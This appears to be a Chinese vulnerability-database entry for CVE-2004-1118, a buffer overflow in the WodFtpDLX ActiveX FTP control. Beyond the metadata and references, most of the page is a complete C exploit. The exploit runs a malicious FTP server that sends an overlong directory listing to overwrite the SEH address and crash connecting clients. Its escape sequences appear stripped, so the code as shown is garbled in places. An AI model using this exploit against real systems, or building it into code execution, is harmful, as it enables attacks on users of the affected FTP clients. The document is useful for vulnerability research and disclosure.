weonlydo WodFTPDLX WodFTPDLX.dll 缓冲区溢出漏洞

漏洞ID	1108294	漏洞类型	缓冲区溢出
发布时间	2004-11-22	更新时间	2005-10-20
CVE编号	CVE-2004-1118	CNNVD-ID	CNNVD-200501-198
漏洞平台	Windows	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/649
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-198

|漏洞详情

WodFtpDLX是一款ActiveX组件，支持SSH及SSL的FTP文件传输。WodFtpDLX2.3.2.97之前版本中wodFTPDLX.ocx控件存在缓冲区溢出漏洞。使用该控件的CoffeeCupDircectFTP6.2.062及CoffeeCupFreeFTP3.0.0.10均受其影响。远程攻击者可通过长文件名触发溢出，执行任意代码。

|漏洞EXP

/************************************************************************************

	WodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit
	created by Komrade
	e-mail:	unsecure(at)altervista(dot)org
	web:	http://unsecure.altervista.org

	Tested on WodFtpDLX.ocx versions 2.3.2.90 - 2.3.0.0 - 2.2.0.1
                on a Windows XP Professional sp2 operating system.

	This exploit creates a fake FTP server on your machine, waiting for the
	connection of an application that uses the WodFtpDLX.ocx ActiveX Control.
	After the exploit is sent the application will crash, trying to access
	to a bad memory address: 0xDEADCODE.
	This exploit can be executed locally or remotely.

	Usage: wodftpcrash [-l] [-r server IP]

	Options:
	 -l		executed locally
	 -r serverIP	executed remotely. You need to specify the address
	 		of the FTP server for the PASV command (Insert your IP address)

	Examples:

	C:> wodftpcrash -l		<- executed locally
	C:> wodftpCrash -r 10.0.0.1	<- executed remotely

***************************************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define FTP_PORT 21
#define PASV_PORT 1106

int wait = TRUE;

DWORD WINAPI fileList(LPVOID data);

int main(int argc,char **argv){

	SOCKET sock, client;
	struct sockaddr_in sock_addr,client_addr;
	WSADATA data;
	WORD p;
	char mess[4096], received[512], addr[32];
	int lun, n, i, err;
	HANDLE fileListH;
	DWORD fileListId, exitCode;

	printf("------------------------------------------------------------------------------rn");
	printf("WodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploitrn");
	printf("tttcreated by Komradernrn");

	printf("tte-mail: unsecure(at)altervista(dot)orgrn");
	printf("ttweb: http://unsecure.altervista.orgrn");
	printf("------------------------------------------------------------------------------rnrn");

	if (((argc != 2) || (strcmp(argv[1], "-l") != 0)) && ((argc != 3) || (strcmp(argv[1], "-r") != 0))){
		printf("Usage: WodFtpCrash [-l] [-r server IP]rnrn");
		printf("Options:rn");
	 	printf(" -lttexecuted locally.rn");
		printf(" -r server IPtexecuted remotely. You need to specify the address of thern");
		printf("ttFTP server for the PASV command (Insert your IP address)rn");
		printf("rnExamples:rn");
		printf(" wodftpcrash -ltttexecuted locallyrn");
		printf(" wodftpCrash -r 10.0.0.1texecuted remotelyrn");
		return 0;
	}

       	if(strcmp(argv[1], "-r") == 0){
		char *token[4];

		token[0]=strtok(argv[2], ".");
		for(i = 1; i < 4; i++){
			token[i]=strtok(NULL, ".");
		}

		strcpy(addr, "");

		for(i=0; (i < 4) && (token[i]!= NULL); i++){
			strlcat(addr, token[i], 16);
			strcat(addr, ",");
		}
	}
	else
		strcpy(addr, "127,0,0,1,");

	p = MAKEWORD(2, 0);
	WSAStartup(p, &data);

	sock=socket(PF_INET,SOCK_STREAM,0);
	sock_addr.sin_family=PF_INET;
	sock_addr.sin_port=htons(FTP_PORT);
	sock_addr.sin_addr.s_addr=INADDR_ANY;

        err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
	if (err < 0){
		printf("Error in bind(). Port may be in usern");
		return -1;
	}
	err = listen(sock,1);
	if (err < 0){
		printf("Error in listen()rn");
		return -1;
	}

	lun = sizeof (struct sockaddr);

	printf("Opening the FTP port and waiting for connections...rn");
	client = accept(sock, (struct sockaddr*)&client_addr, &lun);
	printf("Client connected from IP: %srnrn", inet_ntoa(client_addr.sin_addr));

	strcpy(mess, "220 WodFtpDlx ActiveX Control Crash Exploitrn");
	n=send(client, mess, strlen(mess), 0);
	if (n < 0){
		printf("Error in send()rn");
		return -1;
	}

	while(wait == TRUE){

		Sleep(800);
		n = recv(client, received, sizeof(mess), 0);
		if (n < 0){
			printf("Error in recv()rn");
			return -1;
		}

		received[n]=0;
		printf("CLIENT: %s", received);

		if (stricmp("USER", strtok(received, " ")) == 0)
			strcpy(mess, "331 Anonymous access allowed, send password.rn");
		else if (stricmp("PASS", strtok(received, " ")) == 0)
			strcpy(mess, "230 Anonymous user logged in.rn");
		else if (stricmp("PWDrn", received) == 0)
			strcpy(mess, "257 "/" is current directory.rn");
		else if (stricmp("CWD", strtok(received, " ")) == 0)
			strcpy(mess, "257 "/" is current directory.rn");
		else if (stricmp("TYPE", strtok(received, " ")) == 0)
			strcpy(mess, "200 Type set to A.rn");
		else if (stricmp("PASVrn", received) == 0){
			fileListH = CreateThread(NULL, 0, fileList, NULL, 0, &fileListId);
			if (fileListH == NULL)
				printf("Error in CreateThread() %d", GetLastError());
			wsprintf(mess, "227 Entering Passive Mode (%s4,82).rn", addr);
		}
		else if (stricmp("LIST", strtok(received, " ")) == 0 || stricmp("LISTrn", received) == 0){
			strcpy(mess, "125 Data connection already open; Transfer starting.rn");
			printf("SERVER: %srn", mess);
			n=send(client, mess, strlen(mess), 0);
			if (n < 0){
				printf("Error in send()rn");
				return -1;
			}
			wait = FALSE;

			do{
				GetExitCodeThread(fileListH, &exitCode);
				Sleep(100);
			}
			while(exitCode == STILL_ACTIVE);
			printf("< Long file name sent to client >rnrn");

			strcpy(mess, "226 Transfer complete.rn");
		}
		else
			strcpy(mess, "550 Unimplementedrn");

		printf("SERVER: %srn", mess);
		n = send(client, mess, strlen(mess), 0);
		if (n < 0){
				printf("Error in send()rn");
				return -1;
		}
	}

	printf("Wait.......");
	Sleep(2000);
	printf("Exploit succesfully sent!rn");

        closesocket (client);
	closesocket(sock);

	WSACleanup();
	return 0;
}

DWORD WINAPI fileList(LPVOID data){

	char SEHAddr[] = "xDExC0xADxDE"; //this will be the new SEH address

	SOCKET sock, client, list;
	struct sockaddr_in sock_addr,client_addr;

	WSADATA wData;
	WORD p;
	char mess[4096];
	int lun, n, i, err;

	p = MAKEWORD(2, 0);
	WSAStartup(p, &wData);

	sock=socket(PF_INET,SOCK_STREAM,0);
	sock_addr.sin_family=PF_INET;
	sock_addr.sin_port=htons(PASV_PORT);
	sock_addr.sin_addr.s_addr=INADDR_ANY;
        err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
	if (err < 0){
		printf("Error in bind(). Port may be in usern");
		return -1;
	}
	err = listen(sock,1);
  	if (err < 0){
  		printf("Error in listen().rn");
  		return -1;
  	}
	lun = sizeof (struct sockaddr);

	client = accept(sock, (struct sockaddr*)&client_addr, &lun);

	while (wait == TRUE)
		Sleep(100);

	strcpy(mess, "03-04-81 12:00PM 3 ");

	for(i=strlen(mess); i<1083; i++)
		mess[i]='a';
	mess[i]='';

	strcat(mess, SEHAddr);

	for(i=strlen(mess); i<1300; i++) // cause the exception
		mess[i]='b';
	mess[i]='';

	strcat(mess, "rn");

	n = send(client, mess, strlen(mess), 0);
	if (n < 0){
		printf("Error in send()rn");
		return -1;
	}

	closesocket(sock);
	closesocket(client);
	WSACleanup();

	return 0;
}

// milw0rm.com [2004-11-22]

|参考资料

来源:XF
名称:wodftpdlx-long-filename-bo(18190)
链接:http://xforce.iss.net/xforce/xfdb/18190
来源:BID
名称:11721
链接:http://www.securityfocus.com/bid/11721
来源:BUGTRAQ
名称:20041122WeOnlyDo!COMFtpDELUXEActiveXControlBufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110114233323417&w;=2
来源:FULLDISC
名称:20041122CoffeeCupFTPClientsBufferOverflowVulnerability
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029244.html
来源:FULLDISC
名称:20041122WeOnlyDo!COMFtpDELUXEActiveXControlBufferOverflowVulnerability
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029243.html

相关推荐: Digital Illusions CE Codename Eagle Remote Denial Of Service Vulnerability

Digital Illusions CE Codename Eagle Remote Denial Of Service Vulnerability 漏洞ID 1097504 漏洞类型 Failure to Handle Exceptional Conditi…

文章版权归作者所有，未经允许请勿转载。

THE END